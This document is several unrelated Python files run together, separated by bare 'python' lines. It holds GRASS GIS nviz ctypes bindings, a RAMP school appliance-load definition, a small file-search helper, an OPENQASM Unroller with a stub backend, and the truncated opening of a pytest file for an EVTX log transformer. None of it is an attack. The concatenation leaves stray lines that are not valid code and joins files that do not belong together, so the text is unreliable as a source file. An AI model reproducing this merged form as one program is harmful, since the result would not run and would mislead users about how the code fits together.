    Nviz_load_image.argtypes = [POINTER(GLubyte), c_int, c_int, c_int]
    Nviz_load_image.restype = c_int
    break

# grass/defs/nviz.h: 44
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_draw_image'):
        continue
    Nviz_draw_image = _lib.Nviz_draw_image
    Nviz_draw_image.argtypes = [c_int, c_int, c_int, c_int, c_int]
    Nviz_draw_image.restype = None
    break

# grass/defs/nviz.h: 45
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_set_2D'):
        continue
    Nviz_set_2D = _lib.Nviz_set_2D
    Nviz_set_2D.argtypes = [c_int, c_int]
    Nviz_set_2D.restype = None
    break

# grass/defs/nviz.h: 46
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_del_texture'):
        continue
    Nviz_del_texture = _lib.Nviz_del_texture
    Nviz_del_texture.argtypes = [c_int]
    Nviz_del_texture.restype = None
    break

# grass/defs/nviz.h: 47
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_get_max_texture'):
        continue
    Nviz_get_max_texture = _lib.Nviz_get_max_texture
    Nviz_get_max_texture.argtypes = [POINTER(c_int)]
    Nviz_get_max_texture.restype = None
    break

# grass/defs/nviz.h: 50
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_get_exag_height'):
        continue
    Nviz_get_exag_height = _lib.Nviz_get_exag_height
    Nviz_get_exag_height.argtypes = [POINTER(c_double), POINTER(c_double), POINTER(c_double)]
    Nviz_get_exag_height.restype = c_int
    break

# grass/defs/nviz.h: 51
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_get_exag'):
        continue
    Nviz_get_exag = _lib.Nviz_get_exag
    Nviz_get_exag.argtypes = []
    Nviz_get_exag.restype = c_double
    break

# grass/defs/nviz.h: 54
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_set_light_position'):
        continue
    Nviz_set_light_position = _lib.Nviz_set_light_position
    Nviz_set_light_position.argtypes = [POINTER(nv_data), c_int, c_double, c_double, c_double, c_double]
    Nviz_set_light_position.restype = c_int
    break

# grass/defs/nviz.h: 55
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_set_light_bright'):
        continue
    Nviz_set_light_bright = _lib.Nviz_set_light_bright
    Nviz_set_light_bright.argtypes = [POINTER(nv_data), c_int, c_double]
    Nviz_set_light_bright.restype = c_int
    break

# grass/defs/nviz.h: 56
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_set_light_color'):
        continue
    Nviz_set_light_color = _lib.Nviz_set_light_color
    Nviz_set_light_color.argtypes = [POINTER(nv_data), c_int, c_int, c_int, c_int]
    Nviz_set_light_color.restype = c_int
    break

# grass/defs/nviz.h: 57
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_set_light_ambient'):
        continue
    Nviz_set_light_ambient = _lib.Nviz_set_light_ambient
    Nviz_set_light_ambient.argtypes = [POINTER(nv_data), c_int, c_double]
    Nviz_set_light_ambient.restype = c_int
    break

# grass/defs/nviz.h: 58
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_init_light'):
        continue
    Nviz_init_light = _lib.Nviz_init_light
    Nviz_init_light.argtypes = [POINTER(nv_data), c_int]
    Nviz_init_light.restype = c_int
    break

# grass/defs/nviz.h: 59
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_new_light'):
        continue
    Nviz_new_light = _lib.Nviz_new_light
    Nviz_new_light.argtypes = [POINTER(nv_data)]
    Nviz_new_light.restype = c_int
    break

# grass/defs/nviz.h: 60
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_draw_model'):
        continue
    Nviz_draw_model = _lib.Nviz_draw_model
    Nviz_draw_model.argtypes = [POINTER(nv_data)]
    Nviz_draw_model.restype = None
    break

# grass/defs/nviz.h: 63
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_new_map_obj'):
        continue
    Nviz_new_map_obj = _lib.Nviz_new_map_obj
    Nviz_new_map_obj.argtypes = [c_int, String, c_double, POINTER(nv_data)]
    Nviz_new_map_obj.restype = c_int
    break

# grass/defs/nviz.h: 64
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_set_attr'):
        continue
    Nviz_set_attr = _lib.Nviz_set_attr
    Nviz_set_attr.argtypes = [c_int, c_int, c_int, c_int, String, c_double, POINTER(nv_data)]
    Nviz_set_attr.restype = c_int
    break

# grass/defs/nviz.h: 65
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_set_surface_attr_default'):
        continue
    Nviz_set_surface_attr_default = _lib.Nviz_set_surface_attr_default
    Nviz_set_surface_attr_default.argtypes = []
    Nviz_set_surface_attr_default.restype = None
    break

# grass/defs/nviz.h: 66
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_set_vpoint_attr_default'):
        continue
    Nviz_set_vpoint_attr_default = _lib.Nviz_set_vpoint_attr_default
    Nviz_set_vpoint_attr_default.argtypes = []
    Nviz_set_vpoint_attr_default.restype = c_int
    break

# grass/defs/nviz.h: 67
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_set_volume_attr_default'):
        continue
    Nviz_set_volume_attr_default = _lib.Nviz_set_volume_attr_default
    Nviz_set_volume_attr_default.argtypes = []
    Nviz_set_volume_attr_default.restype = c_int
    break

# grass/defs/nviz.h: 68
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_unset_attr'):
        continue
    Nviz_unset_attr = _lib.Nviz_unset_attr
    Nviz_unset_attr.argtypes = [c_int, c_int, c_int]
    Nviz_unset_attr.restype = c_int
    break

# grass/defs/nviz.h: 71
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_init_data'):
        continue
    Nviz_init_data = _lib.Nviz_init_data
    Nviz_init_data.argtypes = [POINTER(nv_data)]
    Nviz_init_data.restype = None
    break

# grass/defs/nviz.h: 72
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_destroy_data'):
        continue
    Nviz_destroy_data = _lib.Nviz_destroy_data
    Nviz_destroy_data.argtypes = [POINTER(nv_data)]
    Nviz_destroy_data.restype = None
    break

# grass/defs/nviz.h: 73
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_set_bgcolor'):
        continue
    Nviz_set_bgcolor = _lib.Nviz_set_bgcolor
    Nviz_set_bgcolor.argtypes = [POINTER(nv_data), c_int]
    Nviz_set_bgcolor.restype = None
    break

# grass/defs/nviz.h: 74
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_get_bgcolor'):
        continue
    Nviz_get_bgcolor = _lib.Nviz_get_bgcolor
    Nviz_get_bgcolor.argtypes = [POINTER(nv_data)]
    Nviz_get_bgcolor.restype = c_int
    break

# grass/defs/nviz.h: 75
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_color_from_str'):
        continue
    Nviz_color_from_str = _lib.Nviz_color_from_str
    Nviz_color_from_str.argtypes = [String]
    Nviz_color_from_str.restype = c_int
    break

# grass/defs/nviz.h: 76
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_new_fringe'):
        continue
    Nviz_new_fringe = _lib.Nviz_new_fringe
    Nviz_new_fringe.argtypes = [POINTER(nv_data), c_int, c_ulong, c_double, c_int, c_int, c_int, c_int]
    Nviz_new_fringe.restype = POINTER(struct_fringe_data)
    break

# grass/defs/nviz.h: 78
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_set_fringe'):
        continue
    Nviz_set_fringe = _lib.Nviz_set_fringe
    Nviz_set_fringe.argtypes = [POINTER(nv_data), c_int, c_ulong, c_double, c_int, c_int, c_int, c_int]
    Nviz_set_fringe.restype = POINTER(struct_fringe_data)
    break

# grass/defs/nviz.h: 80
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_draw_fringe'):
        continue
    Nviz_draw_fringe = _lib.Nviz_draw_fringe
    Nviz_draw_fringe.argtypes = [POINTER(nv_data)]
    Nviz_draw_fringe.restype = None
    break

# grass/defs/nviz.h: 81
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_draw_arrow'):
        continue
    Nviz_draw_arrow = _lib.Nviz_draw_arrow
    Nviz_draw_arrow.argtypes = [POINTER(nv_data)]
    Nviz_draw_arrow.restype = c_int
    break

# grass/defs/nviz.h: 82
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_set_arrow'):
        continue
    Nviz_set_arrow = _lib.Nviz_set_arrow
    Nviz_set_arrow.argtypes = [POINTER(nv_data), c_int, c_int, c_float, c_uint]
    Nviz_set_arrow.restype = c_int
    break

# grass/defs/nviz.h: 83
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_delete_arrow'):
        continue
    Nviz_delete_arrow = _lib.Nviz_delete_arrow
    Nviz_delete_arrow.argtypes = [POINTER(nv_data)]
    Nviz_delete_arrow.restype = None
    break

# grass/defs/nviz.h: 84
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_new_scalebar'):
        continue
    Nviz_new_scalebar = _lib.Nviz_new_scalebar
    Nviz_new_scalebar.argtypes = [POINTER(nv_data), c_int, POINTER(c_float), c_float, c_uint]
    Nviz_new_scalebar.restype = POINTER(struct_scalebar_data)
    break

# grass/defs/nviz.h: 85
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_set_scalebar'):
        continue
    Nviz_set_scalebar = _lib.Nviz_set_scalebar
    Nviz_set_scalebar.argtypes = [POINTER(nv_data), c_int, c_int, c_int, c_float, c_uint]
    Nviz_set_scalebar.restype = POINTER(struct_scalebar_data)
    break

# grass/defs/nviz.h: 86
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_draw_scalebar'):
        continue
    Nviz_draw_scalebar = _lib.Nviz_draw_scalebar
    Nviz_draw_scalebar.argtypes = [POINTER(nv_data)]
    Nviz_draw_scalebar.restype = None
    break

# grass/defs/nviz.h: 87
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_delete_scalebar'):
        continue
    Nviz_delete_scalebar = _lib.Nviz_delete_scalebar
    Nviz_delete_scalebar.argtypes = [POINTER(nv_data), c_int]
    Nviz_delete_scalebar.restype = None
    break

# grass/defs/nviz.h: 90
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_init_view'):
        continue
    Nviz_init_view = _lib.Nviz_init_view
    Nviz_init_view.argtypes = [POINTER(nv_data)]
    Nviz_init_view.restype = None
    break

# grass/defs/nviz.h: 91
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_set_focus_state'):
        continue
    Nviz_set_focus_state = _lib.Nviz_set_focus_state
    Nviz_set_focus_state.argtypes = [c_int]
    Nviz_set_focus_state.restype = c_int
    break

# grass/defs/nviz.h: 92
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_set_focus_map'):
        continue
    Nviz_set_focus_map = _lib.Nviz_set_focus_map
    Nviz_set_focus_map.argtypes = [c_int, c_int]
    Nviz_set_focus_map.restype = c_int
    break

# grass/defs/nviz.h: 93
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_has_focus'):
        continue
    Nviz_has_focus = _lib.Nviz_has_focus
    Nviz_has_focus.argtypes = [POINTER(nv_data)]
    Nviz_has_focus.restype = c_int
    break

# grass/defs/nviz.h: 94
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_set_focus'):
        continue
    Nviz_set_focus = _lib.Nviz_set_focus
    Nviz_set_focus.argtypes = [POINTER(nv_data), c_float, c_float, c_float]
    Nviz_set_focus.restype = c_int
    break

# grass/defs/nviz.h: 95
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_get_focus'):
        continue
    Nviz_get_focus = _lib.Nviz_get_focus
    Nviz_get_focus.argtypes = [POINTER(nv_data), POINTER(c_float), POINTER(c_float), POINTER(c_float)]
    Nviz_get_focus.restype = c_int
    break

# grass/defs/nviz.h: 96
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_get_xyrange'):
        continue
    Nviz_get_xyrange = _lib.Nviz_get_xyrange
    Nviz_get_xyrange.argtypes = [POINTER(nv_data)]
    Nviz_get_xyrange.restype = c_float
    break

# grass/defs/nviz.h: 97
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_get_zrange'):
        continue
    Nviz_get_zrange = _lib.Nviz_get_zrange
    Nviz_get_zrange.argtypes = [POINTER(nv_data), POINTER(c_float), POINTER(c_float)]
    Nviz_get_zrange.restype = c_int
    break

# grass/defs/nviz.h: 98
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_get_longdim'):
        continue
    Nviz_get_longdim = _lib.Nviz_get_longdim
    Nviz_get_longdim.argtypes = [POINTER(nv_data)]
    Nviz_get_longdim.restype = c_float
    break

# grass/defs/nviz.h: 101
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_new_render_window'):
        continue
    Nviz_new_render_window = _lib.Nviz_new_render_window
    Nviz_new_render_window.argtypes = []
    Nviz_new_render_window.restype = POINTER(struct_render_window)
    break

# grass/defs/nviz.h: 102
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_init_render_window'):
        continue
    Nviz_init_render_window = _lib.Nviz_init_render_window
    Nviz_init_render_window.argtypes = [POINTER(struct_render_window)]
    Nviz_init_render_window.restype = None
    break

# grass/defs/nviz.h: 103
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_destroy_render_window'):
        continue
    Nviz_destroy_render_window = _lib.Nviz_destroy_render_window
    Nviz_destroy_render_window.argtypes = [POINTER(struct_render_window)]
    Nviz_destroy_render_window.restype = None
    break

# grass/defs/nviz.h: 104
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_create_render_window'):
        continue
    Nviz_create_render_window = _lib.Nviz_create_render_window
    Nviz_create_render_window.argtypes = [POINTER(struct_render_window), POINTER(None), c_int, c_int]
    Nviz_create_render_window.restype = c_int
    break

# grass/defs/nviz.h: 105
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_make_current_render_window'):
        continue
    Nviz_make_current_render_window = _lib.Nviz_make_current_render_window
    Nviz_make_current_render_window.argtypes = [POINTER(struct_render_window)]
    Nviz_make_current_render_window.restype = c_int
    break

# grass/ogsf.h: 30
try:
    GS_UNIT_SIZE = 1000.0
except:
    pass

# grass/nviz.h: 42
try:
    MAP_OBJ_UNDEFINED = 0
except:
    pass

# grass/nviz.h: 43
try:
    MAP_OBJ_SURF = 1
except:
    pass

# grass/nviz.h: 44
try:
    MAP_OBJ_VOL = 2
except:
    pass

# grass/nviz.h: 45
try:
    MAP_OBJ_VECT = 3
except:
    pass

# grass/nviz.h: 46
try:
    MAP_OBJ_SITE = 4
except:
    pass

# grass/nviz.h: 48
try:
    DRAW_COARSE = 0
except:
    pass

# grass/nviz.h: 49
try:
    DRAW_FINE = 1
except:
    pass

# grass/nviz.h: 50
try:
    DRAW_BOTH = 2
except:
    pass

# grass/nviz.h: 53
try:
    DRAW_QUICK_SURFACE = 1
except:
    pass

# grass/nviz.h: 54
try:
    DRAW_QUICK_VLINES = 2
except:
    pass

# grass/nviz.h: 55
try:
    DRAW_QUICK_VPOINTS = 4
except:
    pass

# grass/nviz.h: 56
try:
    DRAW_QUICK_VOLUME = 8
except:
    pass

# grass/nviz.h: 58
try:
    RANGE = (5 * GS_UNIT_SIZE)
except:
    pass

# grass/nviz.h: 59
try:
    RANGE_OFFSET = (2 * GS_UNIT_SIZE)
except:
    pass

# grass/nviz.h: 60
try:
    ZRANGE = (3 * GS_UNIT_SIZE)
except:
    pass

# grass/nviz.h: 61
try:
    ZRANGE_OFFSET = (1 * GS_UNIT_SIZE)
except:
    pass

# grass/nviz.h: 63
try:
    DEFAULT_SURF_COLOR = 3390463
except:
    pass

# grass/nviz.h: 65
try:
    FORMAT_PPM = 1
except:
    pass

# grass/nviz.h: 66
try:
    FORMAT_TIF = 2
except:
    pass

fringe_data = struct_fringe_data      # grass/nviz.h: 78
arrow_data = struct_arrow_data        # grass/nviz.h: 86
scalebar_data = struct_scalebar_data  # grass/nviz.h: 93
render_window = struct_render_window  # grass/nviz.h: 132

# No inserted files
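# Illustration of the lookup pattern used by the generated bindings above: each
# symbol is searched for in every loaded library and configured on first match.
# This self-contained sketch mirrors that pattern against the C math library
# instead of the GRASS libraries (which are not assumed to be loadable here);
# it is an illustrative addition, not part of the ctypesgen output.
if __name__ == '__main__':
    import ctypes
    import ctypes.util

    _libm_path = ctypes.util.find_library('m')
    _demo_libs = {'m': ctypes.CDLL(_libm_path)} if _libm_path else {}

    demo_cos = None
    for _demo_lib in _demo_libs.values():
        if not hasattr(_demo_lib, 'cos'):
            continue
        demo_cos = _demo_lib.cos
        demo_cos.argtypes = [ctypes.c_double]
        demo_cos.restype = ctypes.c_double
        break

    if demo_cos is not None:
        print(demo_cos(0.0))  # prints 1.0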
python
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 13 12:02:28 2021

@author: Clau
"""

'''
Paper: Energy sufficiency (SDEWES LA 2022)
User: School B - LOWLANDS
'''

from core import User, np

User_list = []

# Defining users
SB = User("School type B", 1)
User_list.append(SB)

# Appliances
SB_indoor_bulb = SB.Appliance(SB, 12, 7, 2, 120, 0.25, 30)
SB_indoor_bulb.windows([480, 780], [840, 1140], 0.35)

SB_outdoor_bulb = SB.Appliance(SB, 3, 13, 1, 60, 0.2, 10)
SB_outdoor_bulb.windows([960, 1080], [0, 0], 0.35)

SB_TV = SB.Appliance(SB, 1, 60, 2, 120, 0.1, 5, occasional_use=0.5)
SB_TV.windows([480, 780], [840, 1140], 0.2)

SB_radio = SB.Appliance(SB, 3, 4, 2, 120, 0.1, 5, occasional_use=0.5)
SB_radio.windows([480, 780], [840, 1140], 0.2)

SB_DVD = SB.Appliance(SB, 2, 8, 2, 120, 0.1, 5, occasional_use=0.5)
SB_DVD.windows([480, 780], [840, 1140], 0.2)

SB_Freezer = SB.Appliance(SB, 1, 200, 1, 1440, 0, 30, 'yes', 3)
SB_Freezer.windows([0, 1440])
SB_Freezer.specific_cycle_1(200, 20, 5, 10)
SB_Freezer.specific_cycle_2(200, 15, 5, 15)
SB_Freezer.specific_cycle_3(200, 10, 5, 20)
SB_Freezer.cycle_behaviour([580, 1200], [0, 0], [510, 579], [0, 0], [0, 509], [1201, 1440])

SB_PC = SB.Appliance(SB, 1, 50, 2, 210, 0.1, 10)
SB_PC.windows([480, 780], [840, 1140], 0.35)

SB_Phone_charger = SB.Appliance(SB, 3, 2, 2, 180, 0.2, 5)
SB_Phone_charger.windows([480, 780], [840, 1140], 0.35)
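# Note on the positional Appliance() arguments above, based on the usual RAMP
# input-file convention (the `core` module is not shown here, so treat this
# mapping as an assumption):
#   Appliance(user, number, power [W], num_windows, func_time [min/day],
#             time_fraction_random_variability, func_cycle [min])
# For example, SB_indoor_bulb would model 12 bulbs of 7 W each, used within
# 2 daily windows for a total of about 120 minutes per day.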
python
# encoding: UTF-8
#
# Copyright (c) 2015 Facility for Rare Isotope Beams
#
"""
Lattice Model application package.
"""
python
import fnmatch
import os


def locate(pattern, root=os.getcwd()):
    for path, dirs, files in os.walk(root):
        for filename in [os.path.abspath(os.path.join(path, filename))
                         for filename in files
                         if fnmatch.fnmatch(filename, pattern)]:
            yield filename
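# Quick usage example for locate(): walk the current directory tree and print
# every file matching a glob pattern (any pattern works; "*.py" is illustrative).
if __name__ == "__main__":
    for match in locate("*.py"):
        print(match)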
python
# -*- coding: utf-8 -*-

# Copyright 2017 IBM RESEARCH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================

"""
OPENQASM interpreter.

Author: Andrew Cross
"""
import math
import copy
from ._unrollerexception import UnrollerException


class Unroller(object):
    """OPENQASM interpreter object that unrolls subroutines and loops."""

    def __init__(self, ast, backend=None):
        """Initialize interpreter's data."""
        # Abstract syntax tree from parser
        self.ast = ast
        # Backend object
        self.backend = backend
        # OPENQASM version number
        self.version = 0.0
        # Dict of qreg names and sizes
        self.qregs = {}
        # Dict of creg names and sizes
        self.cregs = {}
        # Dict of gates names and properties
        self.gates = {}
        # List of dictionaries mapping local parameter ids to real values
        self.arg_stack = [{}]
        # List of dictionaries mapping local bit ids to global ids (name, idx)
        self.bit_stack = [{}]

    def _process_bit_id(self, node):
        """Process an Id or IndexedId node as a bit or register type.

        Return a list of tuples (name, index).
        """
        if node.type == "indexed_id":
            # An indexed bit or qubit
            return [(node.name, node.index)]
        elif node.type == "id":
            # A qubit or qreg or creg
            if len(self.bit_stack[-1]) == 0:
                # Global scope
                if node.name in self.qregs:
                    return [(node.name, j)
                            for j in range(self.qregs[node.name])]
                elif node.name in self.cregs:
                    return [(node.name, j)
                            for j in range(self.cregs[node.name])]
                else:
                    raise UnrollerException("expected qreg or creg name:",
                                            "line=%s" % node.line,
                                            "file=%s" % node.file)
            else:
                # Local scope
                if node.name in self.bit_stack[-1]:
                    return [self.bit_stack[-1][node.name]]
                else:
                    raise UnrollerException("expected local bit name:",
                                            "line=%s" % node.line,
                                            "file=%s" % node.file)

    def _process_local_id(self, node):
        """Process an Id node as a local id."""
        # The id must be in arg_stack i.e. the id is inside a gate_body
        id_dict = self.arg_stack[-1]
        if node.name in id_dict:
            return float(id_dict[node.name])
        else:
            raise UnrollerException("expected local parameter name:",
                                    "line=%s" % node.line,
                                    "file=%s" % node.file)

    def _process_custom_unitary(self, node):
        """Process a custom unitary node."""
        name = node.name
        if node.arguments is not None:
            args = self._process_node(node.arguments)
        else:
            args = []
        bits = [self._process_bit_id(node_element)
                for node_element in node.bitlist.children]
        if name in self.gates:
            gargs = self.gates[name]["args"]
            gbits = self.gates[name]["bits"]
            gbody = self.gates[name]["body"]
            # Loop over register arguments, if any.
            maxidx = max(map(len, bits))
            for idx in range(maxidx):
                self.arg_stack.append({gargs[j]: args[j]
                                       for j in range(len(gargs))})
                # Only index into register arguments.
                element = list(map(lambda x: idx * x,
                                   [len(bits[j]) > 1
                                    for j in range(len(bits))]))
                self.bit_stack.append({gbits[j]: bits[j][element[j]]
                                       for j in range(len(gbits))})
                self.backend.start_gate(
                    name,
                    [self.arg_stack[-1][s] for s in gargs],
                    [self.bit_stack[-1][s] for s in gbits])
                if not self.gates[name]["opaque"]:
                    self._process_children(gbody)
                self.backend.end_gate(
                    name,
                    [self.arg_stack[-1][s] for s in gargs],
                    [self.bit_stack[-1][s] for s in gbits])
                self.arg_stack.pop()
                self.bit_stack.pop()
        else:
            raise UnrollerException("internal error undefined gate:",
                                    "line=%s" % node.line,
                                    "file=%s" % node.file)

    def _process_gate(self, node, opaque=False):
        """Process a gate node.

        If opaque is True, process the node as an opaque gate node.
        """
        self.gates[node.name] = {}
        de = self.gates[node.name]
        de["opaque"] = opaque
        de["n_args"] = node.n_args()
        de["n_bits"] = node.n_bits()
        if node.n_args() > 0:
            de["args"] = [element.name for element in node.arguments.children]
        else:
            de["args"] = []
        de["bits"] = [c.name for c in node.bitlist.children]
        if opaque:
            de["body"] = None
        else:
            de["body"] = node.body
        self.backend.define_gate(node.name, copy.deepcopy(de))

    def _process_cnot(self, node):
        """Process a CNOT gate node."""
        id0 = self._process_bit_id(node.children[0])
        id1 = self._process_bit_id(node.children[1])
        if not (len(id0) == len(id1) or len(id0) == 1 or len(id1) == 1):
            raise UnrollerException("internal error: qreg size mismatch",
                                    "line=%s" % node.line,
                                    "file=%s" % node.file)
        maxidx = max([len(id0), len(id1)])
        for idx in range(maxidx):
            if len(id0) > 1 and len(id1) > 1:
                self.backend.cx(id0[idx], id1[idx])
            elif len(id0) > 1:
                self.backend.cx(id0[idx], id1[0])
            else:
                self.backend.cx(id0[0], id1[idx])

    def _process_binop(self, node):
        """Process a binary operation node."""
        operation = node.children[0]
        lexpr = node.children[1]
        rexpr = node.children[2]
        if operation == '+':
            return self._process_node(lexpr) + self._process_node(rexpr)
        elif operation == '-':
            return self._process_node(lexpr) - self._process_node(rexpr)
        elif operation == '*':
            return self._process_node(lexpr) * self._process_node(rexpr)
        elif operation == '/':
            return self._process_node(lexpr) / self._process_node(rexpr)
        elif operation == '^':
            return self._process_node(lexpr) ** self._process_node(rexpr)
        else:
            raise UnrollerException("internal error: undefined binop",
                                    "line=%s" % node.line,
                                    "file=%s" % node.file)

    def _process_prefix(self, node):
        """Process a prefix node."""
        operation = node.children[0]
        expr = node.children[1]
        if operation == '+':
            return self._process_node(expr)
        elif operation == '-':
            return -self._process_node(expr)
        else:
            raise UnrollerException("internal error: undefined prefix",
                                    "line=%s" % node.line,
                                    "file=%s" % node.file)

    def _process_measure(self, node):
        """Process a measurement node."""
        id0 = self._process_bit_id(node.children[0])
        id1 = self._process_bit_id(node.children[1])
        if len(id0) != len(id1):
            raise UnrollerException("internal error: reg size mismatch",
                                    "line=%s" % node.line,
                                    "file=%s" % node.file)
        for idx, idy in zip(id0, id1):
            self.backend.measure(idx, idy)

    def _process_if(self, node):
        """Process an if node."""
        creg = node.children[0].name
        cval = node.children[1]
        self.backend.set_condition(creg, cval)
        self._process_node(node.children[2])
        self.backend.drop_condition()

    def _process_external(self, n):
        """Process an external function node n."""
        op = n.children[0].name
        expr = n.children[1]
        dispatch = {
            'sin': math.sin,
            'cos': math.cos,
            'tan': math.tan,
            'exp': math.exp,
            'ln': math.log,
            'sqrt': math.sqrt
        }
        if op in dispatch:
            return dispatch[op](self._process_node(expr))
        else:
            raise UnrollerException("internal error: undefined external",
                                    "line=%s" % n.line,
                                    "file=%s" % n.file)

    def _process_children(self, node):
        """Call process_node for all children of node."""
        for c in node.children:
            self._process_node(c)

    def _process_node(self, node):
        """Carry out the action associated with node n."""
        if node.type == "program":
            self._process_children(node)
        elif node.type == "qreg":
            self.qregs[node.name] = int(node.index)
            self.backend.new_qreg(node.name, int(node.index))
        elif node.type == "creg":
            self.cregs[node.name] = int(node.index)
            self.backend.new_creg(node.name, int(node.index))
        elif node.type == "id":
            return self._process_local_id(node)
        elif node.type == "int":
            # We process int nodes when they are leaves of expressions
            # and cast them to float to avoid, for example, 3/2 = 1.
            return float(node.value)
        elif node.type == "real":
            return float(node.value)
        elif node.type == "indexed_id":
            # We should not get here.
            raise UnrollerException("internal error n.type == indexed_id:",
                                    "line=%s" % node.line,
                                    "file=%s" % node.file)
        elif node.type == "id_list":
            # We process id_list nodes when they are leaves of barriers.
            return [self._process_bit_id(node_children)
                    for node_children in node.children]
        elif node.type == "primary_list":
            # We should only be called for a barrier.
            return [self._process_bit_id(m) for m in node.children]
        elif node.type == "gate":
            self._process_gate(node)
        elif node.type == "custom_unitary":
            self._process_custom_unitary(node)
        elif node.type == "universal_unitary":
            args = tuple(self._process_node(node.children[0]))
            qid = self._process_bit_id(node.children[1])
            for element in qid:
                self.backend.u(args, element)
        elif node.type == "cnot":
            self._process_cnot(node)
        elif node.type == "expression_list":
            return [self._process_node(node_children)
                    for node_children in node.children]
        elif node.type == "binop":
            return self._process_binop(node)
        elif node.type == "prefix":
            return self._process_prefix(node)
        elif node.type == "measure":
            self._process_measure(node)
        elif node.type == "magic":
            self.version = float(node.children[0])
            self.backend.version(node.children[0])
        elif node.type == "barrier":
            ids = self._process_node(node.children[0])
            self.backend.barrier(ids)
        elif node.type == "reset":
            id0 = self._process_bit_id(node.children[0])
            for idx in range(len(id0)):
                self.backend.reset(id0[idx])
        elif node.type == "if":
            self._process_if(node)
        elif node.type == "opaque":
            self._process_gate(node, opaque=True)
        elif node.type == "external":
            return self._process_external(node)
        else:
            raise UnrollerException("internal error: undefined node type",
                                    node.type,
                                    "line=%s" % node.line,
                                    "file=%s" % node.file)

    def set_backend(self, backend):
        """Set the backend object."""
        self.backend = backend

    def execute(self):
        """Interpret OPENQASM and make appropriate backend calls."""
        if self.backend is not None:
            self._process_node(self.ast)
        else:
            raise UnrollerException("backend not attached")
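# A minimal sketch of the backend interface the Unroller drives. The method names
# below are taken from the calls made in _process_node and the helper methods
# above; the class itself is a hypothetical stub added for illustration, not part
# of the original module, and simply logs every call it receives.
class PrintingBackend(object):
    """Backend stub that logs every call the Unroller makes."""

    def version(self, version):
        print("OPENQASM", version)

    def new_qreg(self, name, size):
        print("qreg", name, size)

    def new_creg(self, name, size):
        print("creg", name, size)

    def define_gate(self, name, gatedata):
        print("gate definition", name)

    def start_gate(self, name, args, bits):
        print("start gate", name, args, bits)

    def end_gate(self, name, args, bits):
        print("end gate", name, args, bits)

    def u(self, args, qubit):
        print("U", args, qubit)

    def cx(self, qubit0, qubit1):
        print("CX", qubit0, qubit1)

    def measure(self, qubit, bit):
        print("measure", qubit, "->", bit)

    def barrier(self, idlists):
        print("barrier", idlists)

    def reset(self, qubit):
        print("reset", qubit)

    def set_condition(self, creg, cval):
        print("if", creg, "==", cval)

    def drop_condition(self):
        print("end if")


# Usage sketch: Unroller(ast, PrintingBackend()).execute(), where `ast` comes
# from the OPENQASM parser that normally accompanies this module.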
python
import pytest

from beagle.nodes import File, Process
from beagle.transformers.evtx_transformer import WinEVTXTransformer


@pytest.fixture
def transformer() -> WinEVTXTransformer:
    return WinEVTXTransformer(None)


def test_process_creation(transformer):
    input_event = {
        "provider_name": "Microsoft-Windows-Security-Auditing",
